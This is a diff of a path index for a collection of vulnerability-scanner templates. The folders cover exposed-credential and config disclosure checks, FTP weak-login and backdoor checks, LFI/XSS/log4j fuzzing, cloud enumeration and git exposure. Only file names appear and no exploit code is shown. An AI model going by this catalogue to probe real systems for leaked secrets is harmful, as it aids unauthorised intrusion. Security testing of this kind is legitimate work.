./poc/exposed/avtech-password-disclosure.yaml ./poc/exposed/axiom-digitalocean-key-exposure-665.yaml ./poc/exposed/axiom-digitalocean-key-exposure-666.yaml -./poc/exposed/axiom-digitalocean-key-exposure-667.yaml ./poc/exposed/axiom-digitalocean-key-exposure-668.yaml +./poc/exposed/axiom-digitalocean-key-exposure.yaml ./poc/exposed/azure-apim-secret-key-disclosure.yaml ./poc/exposed/azure-pipelines-config-disclosure.yaml ./poc/exposed/azure-pipelines-exposed.yaml @@ -45887,6 +45855,7 @@ ./poc/exposed/bash-history-exposure.yaml ./poc/exposed/beward-ipcamera-disclosure-713.yaml ./poc/exposed/beward-ipcamera-disclosure-714.yaml +./poc/exposed/beward-ipcamera-disclosure-715.yaml ./poc/exposed/beward-ipcamera-disclosure-716.yaml ./poc/exposed/beward-ipcamera-disclosure-717.yaml ./poc/exposed/bitly-secret-key-disclosure.yaml 
@@ -45895,20 +45864,22 @@ ./poc/exposed/casbin-get-users-account-password-disclosure.yaml ./poc/exposed/caucho-resin-info-disclosure-1.yaml ./poc/exposed/caucho-resin-info-disclosure-2.yaml +./poc/exposed/caucho-resin-info-disclosure-871.yaml ./poc/exposed/caucho-resin-info-disclosure-872.yaml -./poc/exposed/caucho-resin-info-disclosure.yaml +./poc/exposed/cisco-meraki-exposure-944.yaml ./poc/exposed/cisco-meraki-exposure-945.yaml -./poc/exposed/cisco-meraki-exposure-946.yaml ./poc/exposed/cisco-meraki-exposure.yaml ./poc/exposed/cisco-smi-exposure-970.yaml -./poc/exposed/cisco-smi-exposure-972.yaml +./poc/exposed/cisco-smi-exposure-971.yaml ./poc/exposed/cisco-smi-exposure.yaml ./poc/exposed/clockwork-dashboard-exposure-1012.yaml ./poc/exposed/clockwork-dashboard-exposure-1013.yaml +./poc/exposed/clockwork-dashboard-exposure-1015.yaml ./poc/exposed/clockwork-dashboard-exposure.yaml ./poc/exposed/cobbler-exposed-directories.yaml ./poc/exposed/commax-credentials-disclosure-1158.yaml ./poc/exposed/commax-credentials-disclosure-1159.yaml +./poc/exposed/commax-credentials-disclosure-1160.yaml ./poc/exposed/comtrend-password-exposure-1166.yaml ./poc/exposed/comtrend-password-exposure-1167.yaml ./poc/exposed/container-registry-exposure.yaml @@ -45917,7 +45888,7 @@ ./poc/exposed/coremail-config-disclosure-1214.yaml ./poc/exposed/coremail-config-disclosure-1216.yaml ./poc/exposed/coremail-config-disclosure.yaml -./poc/exposed/couchdb-exposure-1238.yaml +./poc/exposed/couchdb-exposure-1239.yaml ./poc/exposed/couchdb-exposure-1240.yaml ./poc/exposed/couchdb-exposure-1241.yaml ./poc/exposed/couchdb-exposure.yaml 
@@ -45929,11 +45900,13 @@ ./poc/exposed/credentials-disclosure-1253.yaml ./poc/exposed/credentials-disclosure-1254.yaml ./poc/exposed/credentials-disclosure-1255.yaml +./poc/exposed/credentials-disclosure-1256.yaml ./poc/exposed/credentials-disclosure-all.yaml ./poc/exposed/dahua-passowrd-disclosure.yaml ./poc/exposed/dashboard-exposed.yaml ./poc/exposed/database.json-exposure.yaml ./poc/exposed/dede-cms-radminpass-disclosure.yaml +./poc/exposed/django-debug-exposed-404.yaml ./poc/exposed/django-debug-exposure-7028.yaml ./poc/exposed/django-debug-exposure-7029.yaml ./poc/exposed/django-debug-exposure-7030.yaml @@ -45945,11 +45918,10 @@ ./poc/exposed/dockerfile-disclosure.yaml ./poc/exposed/dockerfile-hidden-disclosure-1.yaml ./poc/exposed/dockerfile-hidden-disclosure-2.yaml +./poc/exposed/dockerfile-hidden-disclosure-7061.yaml ./poc/exposed/dockerfile-hidden-disclosure-7062.yaml -./poc/exposed/dockerfile-hidden-disclosure-7063.yaml ./poc/exposed/dockerfile-hidden-disclosure.yaml ./poc/exposed/doorgets-info-disclosure.yaml -./poc/exposed/druid-console-exposure-7092.yaml ./poc/exposed/druid-console-exposure-7093.yaml ./poc/exposed/druid-console-exposure-7094.yaml ./poc/exposed/druid-console-exposure.yaml @@ -45990,10 +45962,12 @@ ./poc/exposed/exposed security questions.yaml ./poc/exposed/exposed-adb-7280.yaml ./poc/exposed/exposed-adb-7281.yaml +./poc/exposed/exposed-adb-7282.yaml ./poc/exposed/exposed-adb.yaml ./poc/exposed/exposed-alps-spring-1.yaml ./poc/exposed/exposed-alps-spring-2.yaml ./poc/exposed/exposed-alps-spring-3.yaml +./poc/exposed/exposed-alps-spring-7283.yaml ./poc/exposed/exposed-alps-spring-7284.yaml ./poc/exposed/exposed-alps-spring-7285.yaml ./poc/exposed/exposed-alps-spring.yaml 
@@ -46005,17 +45979,19 @@ ./poc/exposed/exposed-authentication.asmx.yaml ./poc/exposed/exposed-backup-files.yaml ./poc/exposed/exposed-bitkeeper-7290.yaml +./poc/exposed/exposed-bitkeeper-7292.yaml ./poc/exposed/exposed-bitkeeper.yaml ./poc/exposed/exposed-bzr-7293.yaml ./poc/exposed/exposed-bzr-7295.yaml ./poc/exposed/exposed-bzr.yaml ./poc/exposed/exposed-darcs-7296.yaml -./poc/exposed/exposed-darcs-7298.yaml +./poc/exposed/exposed-darcs-7297.yaml ./poc/exposed/exposed-darcs.yaml ./poc/exposed/exposed-docker-api-1.yaml ./poc/exposed/exposed-docker-api-2.yaml ./poc/exposed/exposed-docker-api-7299.yaml ./poc/exposed/exposed-docker-api-7300.yaml +./poc/exposed/exposed-docker-api-7301.yaml ./poc/exposed/exposed-dockerd.yaml ./poc/exposed/exposed-elasticsearch.yaml ./poc/exposed/exposed-env-js.yaml @@ -46028,7 +46004,6 @@ ./poc/exposed/exposed-gitignore-2.yaml ./poc/exposed/exposed-gitignore-3.yaml ./poc/exposed/exposed-gitignore-7302.yaml -./poc/exposed/exposed-gitignore-7303.yaml ./poc/exposed/exposed-gitignore-7304.yaml ./poc/exposed/exposed-gitignore-7306.yaml ./poc/exposed/exposed-gitlab-ci-config.yaml @@ -46040,15 +46015,16 @@ ./poc/exposed/exposed-grafana.yaml ./poc/exposed/exposed-graphql.yaml ./poc/exposed/exposed-hg-7311.yaml +./poc/exposed/exposed-hg-7312.yaml ./poc/exposed/exposed-hg.yaml ./poc/exposed/exposed-jenkins.yaml ./poc/exposed/exposed-jira.yaml ./poc/exposed/exposed-jquery-file-upload-7313.yaml ./poc/exposed/exposed-jquery-file-upload-7314.yaml ./poc/exposed/exposed-jquery-file-upload-7315.yaml -./poc/exposed/exposed-jquery-file-upload.yaml ./poc/exposed/exposed-kafdrop-7316.yaml ./poc/exposed/exposed-kafdrop-7317.yaml +./poc/exposed/exposed-kafdrop-7318.yaml ./poc/exposed/exposed-kafdrop.yaml ./poc/exposed/exposed-kibana-1.yaml ./poc/exposed/exposed-kibana-2.yaml 
@@ -46063,9 +46039,7 @@ ./poc/exposed/exposed-nomad-7325.yaml ./poc/exposed/exposed-nomad-7326.yaml ./poc/exposed/exposed-nomad-7327.yaml -./poc/exposed/exposed-nomad-7328.yaml ./poc/exposed/exposed-nomad-7329.yaml -./poc/exposed/exposed-nomad-7330.yaml ./poc/exposed/exposed-nomad.yaml ./poc/exposed/exposed-pagespeed-global-admin-7331.yaml ./poc/exposed/exposed-pagespeed-global-admin.yaml @@ -46078,12 +46052,12 @@ ./poc/exposed/exposed-redis-7336.yaml ./poc/exposed/exposed-redis-7337.yaml ./poc/exposed/exposed-redis-7338.yaml +./poc/exposed/exposed-redis-7339.yaml ./poc/exposed/exposed-redis.yaml ./poc/exposed/exposed-service-now-7340.yaml ./poc/exposed/exposed-service-now-7341.yaml ./poc/exposed/exposed-service-now.yaml ./poc/exposed/exposed-sharepoint-list-7344.yaml -./poc/exposed/exposed-sharepoint-list-7345.yaml ./poc/exposed/exposed-sharepoint-list-7346.yaml ./poc/exposed/exposed-sharepoint-list-7347.yaml ./poc/exposed/exposed-sonarqube.yaml @@ -46093,6 +46067,7 @@ ./poc/exposed/exposed-sqlite-manager-7350.yaml ./poc/exposed/exposed-sqlite-manager.yaml ./poc/exposed/exposed-struts.yaml +./poc/exposed/exposed-svn-7351.yaml ./poc/exposed/exposed-svn-7352.yaml ./poc/exposed/exposed-svn-7353.yaml ./poc/exposed/exposed-svn-7354.yaml 
@@ -46102,20 +46077,19 @@ ./poc/exposed/exposed-symfony-profiler.yaml ./poc/exposed/exposed-user-info-error-messages (2).yaml ./poc/exposed/exposed-vscode-7356.yaml -./poc/exposed/exposed-vscode-7357.yaml +./poc/exposed/exposed-vscode.yaml +./poc/exposed/exposed-webalizer-7358.yaml ./poc/exposed/exposed-webalizer-7359.yaml -./poc/exposed/exposed-webalizer-7360.yaml ./poc/exposed/exposed-webalizer.yaml ./poc/exposed/exposed-zookeeper-7361.yaml ./poc/exposed/exposed-zookeeper-7362.yaml ./poc/exposed/exposed-zookeeper-7363.yaml ./poc/exposed/exposed-zookeeper-7364.yaml -./poc/exposed/exposed-zookeeper-7365.yaml ./poc/exposed/exposed-zookeeper.yaml ./poc/exposed/fanruanoa2012-disclosure-1.yaml ./poc/exposed/fanruanoa2012-disclosure-2.yaml +./poc/exposed/fanruanoa2012-disclosure-7389.yaml ./poc/exposed/fanruanoa2012-disclosure-7390.yaml -./poc/exposed/fanruanoa2012-disclosure.yaml ./poc/exposed/fckeditor-exposed.yaml ./poc/exposed/file-manager-exposed.yaml ./poc/exposed/filezilla-exposed.yaml 
@@ -46124,18 +46098,18 @@ ./poc/exposed/firebase-config-exposure-7485.yaml ./poc/exposed/firebase-config-exposure-7486.yaml ./poc/exposed/firebase-config-exposure-7488.yaml -./poc/exposed/firebase-config-exposure.yaml ./poc/exposed/firebase-messaging-sw-js-exposure.yaml -./poc/exposed/flink-exposure-7509.yaml ./poc/exposed/flink-exposure-7510.yaml +./poc/exposed/flink-exposure-7511.yaml ./poc/exposed/flink-exposure.yaml ./poc/exposed/ftp-credentials-exposure-7567.yaml -./poc/exposed/ftp-credentials-exposure-7568.yaml +./poc/exposed/ftp-credentials-exposure.yaml ./poc/exposed/get-case-insensitive.yaml ./poc/exposed/git-config-exposure.yaml ./poc/exposed/git-credentials-disclosure-7639.yaml -./poc/exposed/git-credentials-disclosure-7640.yaml +./poc/exposed/git-credentials-disclosure-7641.yaml ./poc/exposed/git-credentials-disclosure-7642.yaml +./poc/exposed/git-credentials-disclosure.yaml ./poc/exposed/git-exposure.yaml ./poc/exposed/git-metadata-exposure.yaml ./poc/exposed/git-repo-disclosure.yaml @@ -46158,8 +46132,8 @@ ./poc/exposed/github-workflows-disclosure-5.yaml ./poc/exposed/github-workflows-disclosure-6.yaml ./poc/exposed/github-workflows-disclosure-7.yaml +./poc/exposed/github-workflows-disclosure-7664.yaml ./poc/exposed/github-workflows-disclosure-7665.yaml -./poc/exposed/github-workflows-disclosure-7666.yaml ./poc/exposed/github-workflows-disclosure-8.yaml ./poc/exposed/github-workflows-disclosure-9.yaml ./poc/exposed/github-workflows-disclosure.yaml 
@@ -46170,10 +46144,10 @@ ./poc/exposed/glpi-status-ldap-domain-disclosure-3.yaml ./poc/exposed/glpi-telemetry-disclosure-1.yaml ./poc/exposed/glpi-telemetry-disclosure-2.yaml -./poc/exposed/glpi-telemetry-disclosure-7739.yaml ./poc/exposed/glpi-telemetry-disclosure.yaml ./poc/exposed/go-mod-disclosure.yaml ./poc/exposed/go-pprof-exposed.yaml +./poc/exposed/gogs-install-exposure-7755.yaml ./poc/exposed/gogs-install-exposure-7757.yaml ./poc/exposed/gogs-install-exposure-7758.yaml ./poc/exposed/gogs-install-exposure.yaml @@ -46195,8 +46169,8 @@ ./poc/exposed/hidden-api-key-exposure.yaml ./poc/exposed/hikvision-env-disclosure.yaml ./poc/exposed/hp-ilo-serial-key-disclosure-8022.yaml -./poc/exposed/hp-ilo-serial-key-disclosure-8023.yaml ./poc/exposed/hp-ilo-serial-key-disclosure-8024.yaml +./poc/exposed/hp-ilo-serial-key-disclosure-8025.yaml ./poc/exposed/hp-ilo-serial-key-disclosure.yaml ./poc/exposed/ibm-friendly-path-exposure-1.yaml ./poc/exposed/ibm-friendly-path-exposure-2.yaml @@ -46239,13 +46213,14 @@ ./poc/exposed/jenkins-exposed.yaml ./poc/exposed/jenkins-home-dir-exposure.yaml ./poc/exposed/jetty-information-disclosure.yaml +./poc/exposed/jfrog-unauth-build-exposed-8299.yaml ./poc/exposed/jfrog-unauth-build-exposed-8300.yaml ./poc/exposed/jfrog-unauth-build-exposed-8301.yaml ./poc/exposed/jfrog-unauth-build-exposed-8302.yaml ./poc/exposed/jfrog-unauth-build-exposed.yaml ./poc/exposed/jiva-admin-exposure.yaml ./poc/exposed/jolokia-heap-info-disclosure-8357.yaml -./poc/exposed/jolokia-info-disclosure-8358.yaml +./poc/exposed/jolokia-info-disclosure-8359.yaml ./poc/exposed/jolokia-info-disclosure.yaml ./poc/exposed/joomla-sensitive-config.yaml ./poc/exposed/jupyter-notebooks-exposed.yaml 
@@ -46255,7 +46230,6 @@ ./poc/exposed/kronos-wsld-exposure.yaml ./poc/exposed/kubernetes-kustomization-disclosure-8531.yaml ./poc/exposed/kubernetes-kustomization-disclosure-8532.yaml -./poc/exposed/kubernetes-kustomization-disclosure.yaml ./poc/exposed/kyan-credential-exposure-8554.yaml ./poc/exposed/kyan-credential-exposure.yaml ./poc/exposed/kyan-network-credentials-disclosure.yaml @@ -46268,15 +46242,14 @@ ./poc/exposed/locust-exposure.yaml ./poc/exposed/logstash-config-exposure.yml ./poc/exposed/lvmeng-uts-disclosure-8679.yaml -./poc/exposed/lvmeng-uts-disclosure-8680.yaml ./poc/exposed/lvmeng-uts-disclosure-8681.yaml ./poc/exposed/lvmeng-uts-disclosure.yaml ./poc/exposed/magento-2-exposed-api-1.yaml ./poc/exposed/magento-2-exposed-api-2.yaml ./poc/exposed/magento-2-exposed-api-3.yaml ./poc/exposed/magento-2-exposed-api-8687.yaml +./poc/exposed/magento-2-exposed-api-8688.yaml ./poc/exposed/magento-2-exposed-api-8689.yaml -./poc/exposed/magento-config-disclosure.yaml ./poc/exposed/magento-information-disclosure.yaml ./poc/exposed/mapbox-token-disclosure.yaml ./poc/exposed/mobsf-framework-exposure.yaml @@ -46292,6 +46265,7 @@ ./poc/exposed/netgear-router-exposure-9029.yaml ./poc/exposed/netgear-router-exposure-9030.yaml ./poc/exposed/netgear-router-exposure-9031.yaml +./poc/exposed/netgear-router-exposure.yaml ./poc/exposed/nexus-repo-config-exposure.yml ./poc/exposed/nexus-repository-exposed-configuration.yaml ./poc/exposed/nginx-conf-exposed.yaml @@ -46310,7 +46284,6 @@ ./poc/exposed/oracle-ebs-credentials-disclosure-9363.yaml ./poc/exposed/oracle-ebs-credentials-disclosure.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9367.yaml -./poc/exposed/oracle-ebs-sqllog-disclosure-9369.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9370.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9371.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9372.yaml 
@@ -46320,7 +46293,7 @@ ./poc/exposed/path-traversal-exposure.yaml ./poc/exposed/pgadmin-exposure-9488.yaml ./poc/exposed/pgadmin-exposure-9489.yaml -./poc/exposed/pgadmin-exposure-9490.yaml +./poc/exposed/pgadmin-exposure-9491.yaml ./poc/exposed/pgadmin-exposure.yaml ./poc/exposed/php-debugbar-exposure.yaml ./poc/exposed/php-user-ini-disclosure-1.yaml @@ -46336,12 +46309,12 @@ ./poc/exposed/pmb-local-file-disclosure-9616.yaml ./poc/exposed/pmb-local-file-disclosure-9617.yaml ./poc/exposed/pmb-local-file-disclosure-9618.yaml -./poc/exposed/pmb-local-file-disclosure-9620.yaml +./poc/exposed/pmb-local-file-disclosure-9619.yaml +./poc/exposed/pmb-local-file-disclosure.yaml ./poc/exposed/postman-api-key-disclosure.yaml ./poc/exposed/private-key-exposure-9654.yaml ./poc/exposed/prometheus-exposed-panel-9679.yaml ./poc/exposed/prometheus-exposed-panel-9680.yaml -./poc/exposed/prometheus-exposed-panel-9681.yaml ./poc/exposed/prometheus-exposed-panel-9682.yaml ./poc/exposed/prometheus-exposed-panel-9683.yaml ./poc/exposed/prometheus-exposed-panel-9684.yaml 
@@ -46349,22 +46322,24 @@ ./poc/exposed/prometheus-pushgateway-exposed-panel.yaml ./poc/exposed/proton-recovery-phrase-disclosure.yaml ./poc/exposed/putty-private-key-disclosure-9729.yaml +./poc/exposed/putty-private-key-disclosure-9730.yaml ./poc/exposed/putty-private-key-disclosure-9731.yaml -./poc/exposed/putty-private-key-disclosure-9732.yaml ./poc/exposed/putty-private-key-disclosure.yaml ./poc/exposed/pyproject-disclosure-9735.yaml ./poc/exposed/pyproject-disclosure-9736.yaml -./poc/exposed/pyproject-disclosure-9737.yaml +./poc/exposed/pyproject-disclosure-9738.yaml ./poc/exposed/qianxin-tianqing-info-disclosure.yaml ./poc/exposed/qihang-media-disclosure-9762.yaml ./poc/exposed/qihang-media-disclosure-9763.yaml +./poc/exposed/qihang-media-disclosure-9764.yaml ./poc/exposed/qihang-media-disclosure-9765.yaml +./poc/exposed/qihang-media-disclosure.yaml ./poc/exposed/qvidium-management-system-exposed.yaml ./poc/exposed/qywechat-secret-disclosure.yaml ./poc/exposed/rabbitmq-config-exposure.yml ./poc/exposed/rails-routes-exposed.yaml ./poc/exposed/rails-secret-token-disclosure-9808.yaml -./poc/exposed/rails-secret-token-disclosure-9809.yaml +./poc/exposed/rails-secret-token-disclosure-9810.yaml ./poc/exposed/rails-secret-token-disclosure.yaml ./poc/exposed/razorpay-clientid-disclosure.yaml ./poc/exposed/redis-commander-exposure-9851.yaml 
@@ -46376,11 +46351,12 @@ ./poc/exposed/rocketmq-console-exposure.yaml ./poc/exposed/roundcube-log-disclosure-1.yaml ./poc/exposed/roundcube-log-disclosure-2.yaml -./poc/exposed/roundcube-log-disclosure-9905.yaml ./poc/exposed/roundcube-log-disclosure-9906.yaml +./poc/exposed/roundcube-log-disclosure-9907.yaml ./poc/exposed/roundcube-log-disclosure.yaml ./poc/exposed/ruby-on-rails-secret-token-disclosure.yaml ./poc/exposed/ruijie-information-disclosure-9930.yaml +./poc/exposed/ruijie-information-disclosure-9931.yaml ./poc/exposed/ruijie-information-disclosure-9932.yaml ./poc/exposed/ruijie-nbr1300g-exposure-9935.yaml ./poc/exposed/ruijie-nbr1300g-exposure-9937.yaml @@ -46394,7 +46370,7 @@ ./poc/exposed/seeyon-a6-createmysql-disclosure.yaml ./poc/exposed/seeyon-a8-info-disclosure.yaml ./poc/exposed/seeyon-oa-session-information-disclosure.yaml -./poc/exposed/selenium-exposure-10138.yaml +./poc/exposed/selenium-exposure-10137.yaml ./poc/exposed/selenium-exposure.yaml ./poc/exposed/selenoid-ui-exposure-10139.yaml ./poc/exposed/selenoid-ui-exposure.yaml @@ -46413,13 +46389,11 @@ ./poc/exposed/sensitive-storage-exposure-4.yaml ./poc/exposed/sensitive-storage-exposure-5.yaml ./poc/exposed/sensitive-storage-exposure-6.yaml -./poc/exposed/sensitive-storage-exposure.yaml ./poc/exposed/sensitives.yaml ./poc/exposed/server-config-exposure.yaml ./poc/exposed/service-now-exposed.yaml ./poc/exposed/setup-page-exposure-1.yaml ./poc/exposed/setup-page-exposure-10180.yaml -./poc/exposed/setup-page-exposure-10181.yaml ./poc/exposed/setup-page-exposure-2.yaml ./poc/exposed/setup-page-exposure-3.yaml ./poc/exposed/setup-page-exposure-4.yaml 
@@ -46429,12 +46403,12 @@ ./poc/exposed/sftp-credentials-exposure-2.yaml ./poc/exposed/smf-path-disclosure.yaml ./poc/exposed/snyk-ignore-file-disclosure-10346.yaml +./poc/exposed/snyk-ignore-file-disclosure-10347.yaml ./poc/exposed/snyk-ignore-file-disclosure-10348.yaml -./poc/exposed/snyk-ignore-file-disclosure-10349.yaml ./poc/exposed/snyk-ignore-file-disclosure.yaml ./poc/exposed/solr-exposure-10363.yaml +./poc/exposed/solr-exposure-10364.yaml ./poc/exposed/solr-exposure-10365.yaml -./poc/exposed/solr-exposure-10366.yaml ./poc/exposed/solr-exposure.yaml ./poc/exposed/solr-panel-exposure.yaml ./poc/exposed/sonarqube-config-exposure.yml @@ -46452,12 +46426,11 @@ ./poc/exposed/thinkphp-509-information-disclosure-10752.yaml ./poc/exposed/thinkphp-509-information-disclosure-10753.yaml ./poc/exposed/thinkphp-509-information-disclosure-10754.yaml -./poc/exposed/thinkphp-509-information-disclosure-10755.yaml ./poc/exposed/thinkphp-509-information-disclosure.yaml ./poc/exposed/thumbs-db-disclosure-10760.yaml ./poc/exposed/thumbs-db-disclosure-10761.yaml ./poc/exposed/thumbs-db-disclosure-10762.yaml -./poc/exposed/thumbs-db-disclosure.yaml +./poc/exposed/thumbs-db-disclosure-10763.yaml ./poc/exposed/titannit-web-exposure.yaml ./poc/exposed/tomcat-cookie-exposed.yaml ./poc/exposed/tomcat-exposed-docs.yaml @@ -46471,9 +46444,8 @@ ./poc/exposed/travis-ci-disclosure.yaml ./poc/exposed/truffle-config-exposure.yaml ./poc/exposed/tugboat-config-exposure-10841.yaml -./poc/exposed/tugboat-config-exposure-10842.yaml +./poc/exposed/tugboat-config-exposure-10843.yaml ./poc/exposed/tugboat-config-exposure-10844.yaml -./poc/exposed/tugboat-config-exposure.yaml ./poc/exposed/typea-ftc-disclosure-76c6b84ccd9f6bd60eada03675ff7bce.yaml ./poc/exposed/typea-ftc-disclosure-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/exposed/typea-ftc-disclosure.yaml 
@@ -46485,8 +46457,8 @@ ./poc/exposed/vpc-endpoint-exposed.yaml ./poc/exposed/wallet-recovery-phrase-disclosure.yml ./poc/exposed/watchguard-credentials-disclosure-11105.yaml -./poc/exposed/watchguard-credentials-disclosure-11106.yaml ./poc/exposed/watchguard-credentials-disclosure-11107.yaml +./poc/exposed/watchguard-credentials-disclosure.yaml ./poc/exposed/weaver_e_cology9_Information_disclosure.yaml ./poc/exposed/webmin-config-exposure.yml ./poc/exposed/wordpress-config-disclosure.yaml @@ -46495,8 +46467,8 @@ ./poc/exposed/wordpress-wp-config-exposure.yml ./poc/exposed/wordpress-wpcourses-info-disclosure-11367.yaml ./poc/exposed/wordpress-wpcourses-info-disclosure-11368.yaml +./poc/exposed/wordpress-wpcourses-info-disclosure-11369.yaml ./poc/exposed/wordpress-wpcourses-info-disclosure-11370.yaml -./poc/exposed/wordpress-wpcourses-info-disclosure-11371.yaml ./poc/exposed/wordpress-wpcourses-info-disclosure.yaml ./poc/exposed/wp-affiliate-disclosure-047309c077ef8436ac32af01d6e52b55.yaml ./poc/exposed/wp-affiliate-disclosure-10a22924ce2a012a99f4110178fc4e04.yaml @@ -46506,16 +46478,16 @@ ./poc/exposed/wp-affiliate-disclosure-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/exposed/wp-affiliate-disclosure.yaml ./poc/exposed/wp-config.php-disclosure.yaml +./poc/exposed/wp-full-path-disclosure-11455.yaml ./poc/exposed/wp-full-path-disclosure-11456.yaml -./poc/exposed/wp-full-path-disclosure-11457.yaml ./poc/exposed/wp-full-path-disclosure.yaml ./poc/exposed/wp-mailchimp-log-exposure-11493.yaml ./poc/exposed/wp-mailchimp-log-exposure-11494.yaml ./poc/exposed/wpeprivate-config-disclosure.yaml ./poc/exposed/wpsensitiveinfo.yaml ./poc/exposed/x5engine-full-path-disclosure.yaml +./poc/exposed/yarn-manager-exposure-11731.yaml ./poc/exposed/yarn-manager-exposure-11732.yaml -./poc/exposed/yarn-manager-exposure-11733.yaml ./poc/exposed/yarn-manager-exposure.yaml ./poc/exposed/yonyou-nc-wsncapplet-disclosure.yaml ./poc/exposed/yyoa-a6-userinfo-disclosure.yaml 
@@ -46524,8 +46496,8 @@ ./poc/exposed/zenphoto-installation-sensitive-info-2.yaml ./poc/exposed/zenphoto-installation-sensitive-info-3.yaml ./poc/exposed/zenphoto-installation-sensitive-info-4.yaml -./poc/exposed/zenphoto-installation-sensitive-info.yaml ./poc/exposed/zenphoto-sensitive-info-1.yaml +./poc/exposed/zenphoto-sensitive-info-11784.yaml ./poc/exposed/zenphoto-sensitive-info-2.yaml ./poc/exposed/zenphoto-sensitive-info-3.yaml ./poc/exposed/zenphoto-sensitive-info-4.yaml @@ -46543,6 +46515,7 @@ ./poc/extract/extract-firebase-database.yaml ./poc/extract/extract-urls-7368.yaml ./poc/extract/extract-urls-7369.yaml +./poc/extract/extract-urls-7370.yaml ./poc/extract/extract-urls.yaml ./poc/extract/extract.yaml ./poc/extract/extractor-bitcoin.yaml @@ -46578,7 +46551,6 @@ ./poc/favicon/favicon-by-realfavicongenerator-e94e235c33e1a3c3c8b84ec6688a2709.yaml ./poc/favicon/favicon-by-realfavicongenerator.yaml ./poc/favicon/favicon-detect.yaml -./poc/favicon/favicon-detection-7441.yaml ./poc/favicon/favicon-detection-7442.yaml ./poc/favicon/favicon-detection-7443.yaml ./poc/favicon/favicon-detection-7445.yaml @@ -46602,11 +46574,14 @@ ./poc/ftp/aws-sftp-detect.yaml ./poc/ftp/crush-ftp-detect-1270.yaml ./poc/ftp/crush-ftp-detect-1271.yaml +./poc/ftp/crush-ftp-detect-1272.yaml ./poc/ftp/crush-ftp-detect.yaml ./poc/ftp/crush-ftp-login-1273.yaml ./poc/ftp/crush-ftp-login-1274.yaml +./poc/ftp/crush-ftp-login-1275.yaml ./poc/ftp/crush-ftp-login.yaml ./poc/ftp/crushftp-anonymous-login.yaml +./poc/ftp/crushftp-default-login.yaml ./poc/ftp/dahua-smart-park-deleteftp-rce.yaml ./poc/ftp/dionaea-ftp-honeypot-detect.yaml ./poc/ftp/dionaea-ftp-honeypot-detection.yaml 
@@ -46614,14 +46589,13 @@ ./poc/ftp/ftp-access.yaml ./poc/ftp/ftp-anonymous-login.yaml ./poc/ftp/ftp-credentials-exposure-7567.yaml -./poc/ftp/ftp-credentials-exposure-7568.yaml +./poc/ftp/ftp-credentials-exposure.yaml ./poc/ftp/ftp-default-credentials.yaml ./poc/ftp/ftp-default-creds.yaml ./poc/ftp/ftp-weak-credentials-7569.yaml -./poc/ftp/ftp-weak-credentials-7570.yaml ./poc/ftp/ftp-weak-credentials.yaml +./poc/ftp/ftpconfig-7565.yaml ./poc/ftp/ftpconfig-7566.yaml -./poc/ftp/ftpconfig.yaml ./poc/ftp/gnu-inetutils-ftpd-detect.yaml ./poc/ftp/mainwp-updraftplus-extension-32da2ccdaaac8b19165da0cc67dc1c8d.yaml ./poc/ftp/mainwp-updraftplus-extension-3642dbf393631c48d93989f2e01cf01e.yaml @@ -46684,7 +46658,6 @@ ./poc/ftp/unauth-ftp-10939.yaml ./poc/ftp/unauth-ftp-10940.yaml ./poc/ftp/unauth-ftp-10941.yaml -./poc/ftp/unauth-ftp-10942.yaml ./poc/ftp/unauth-ftp.yaml ./poc/ftp/unrestricted-sg-ingress-ftp-port.yaml ./poc/ftp/updraftplus-132b1db14c9aafb4ccfc0ec8e04b9e98.yaml @@ -46720,15 +46693,14 @@ ./poc/ftp/updraftplus.yaml ./poc/ftp/vmware-ftp-server.yaml ./poc/ftp/vsftpd-backdoor.yaml -./poc/ftp/vsftpd-detection-11073.yaml ./poc/ftp/vsftpd-detection-11074.yaml +./poc/ftp/vsftpd-detection-11075.yaml ./poc/ftp/vsftpd-detection-11076.yaml ./poc/ftp/vsftpd-detection.yaml ./poc/ftp/wanhu-ezoffice-download-ftp-jsp-filedownload.yaml ./poc/ftp/wanhu-oa-download-ftp-file-read.yaml ./poc/ftp/wanhuOA-download-ftp.yaml ./poc/ftp/web-ftp-detect-11135.yaml -./poc/ftp/web-ftp-detect-11136.yaml ./poc/ftp/web-ftp-detect-11137.yaml ./poc/ftp/web-ftp-detect-11138.yaml ./poc/ftp/wing-ftp-detect.yaml @@ -46764,6 +46736,7 @@ ./poc/fuzz/generic-lfi-fuzzing.yaml ./poc/fuzz/get_fuzzing.yaml ./poc/fuzz/lfi-fuzz.yaml +./poc/fuzz/lfi-linux-fuzz.yaml ./poc/fuzz/linux-lfi-fuzz.yaml ./poc/fuzz/linux-lfi-fuzzing.yaml ./poc/fuzz/log4j-fuzz-head-poc-v1.yaml 
@@ -46785,7 +46758,7 @@ ./poc/fuzz/xss-fuzz.yaml ./poc/fuzz/xss-fuzz.yml ./poc/fuzz/xss_fuzzer.yaml -./poc/gcloud/GCP-service-account.yaml +./poc/gcloud/GCP-service-account (copy 1).yaml ./poc/gcloud/cloud-enum-gcp-app-engine.yaml ./poc/gcloud/cloud-enum-gcp-bucket.yaml ./poc/gcloud/cloud-enum-gcp-firebase-app.yaml @@ -46796,6 +46769,7 @@ ./poc/gcloud/gcp-bucket-enum.yaml ./poc/gcloud/gcp-firebase-app-enum.yaml ./poc/gcloud/gcp-firebase-rtdb-enum.yaml +./poc/gcloud/gcp-service-account-11851.yaml ./poc/gcloud/gcp-service-account-7575.yaml ./poc/gcloud/gcp-service-account.yaml ./poc/gcloud/nktagcloud-a8e6501893b16cbc2185c791f71d5631.yaml @@ -46823,8 +46797,8 @@ ./poc/git/api-gitlab.yml ./poc/git/axiom-digitalocean-key-exposure-665.yaml ./poc/git/axiom-digitalocean-key-exposure-666.yaml -./poc/git/axiom-digitalocean-key-exposure-667.yaml ./poc/git/axiom-digitalocean-key-exposure-668.yaml +./poc/git/axiom-digitalocean-key-exposure.yaml ./poc/git/cgit.yaml ./poc/git/custom-dot-git-detect.yaml ./poc/git/digital-agency-lite-1d0d069f8e40de9d56d2bab8f8887bf2.yaml @@ -46923,7 +46897,6 @@ ./poc/git/exposed-gitignore-2.yaml ./poc/git/exposed-gitignore-3.yaml ./poc/git/exposed-gitignore-7302.yaml -./poc/git/exposed-gitignore-7303.yaml ./poc/git/exposed-gitignore-7304.yaml ./poc/git/exposed-gitignore-7306.yaml 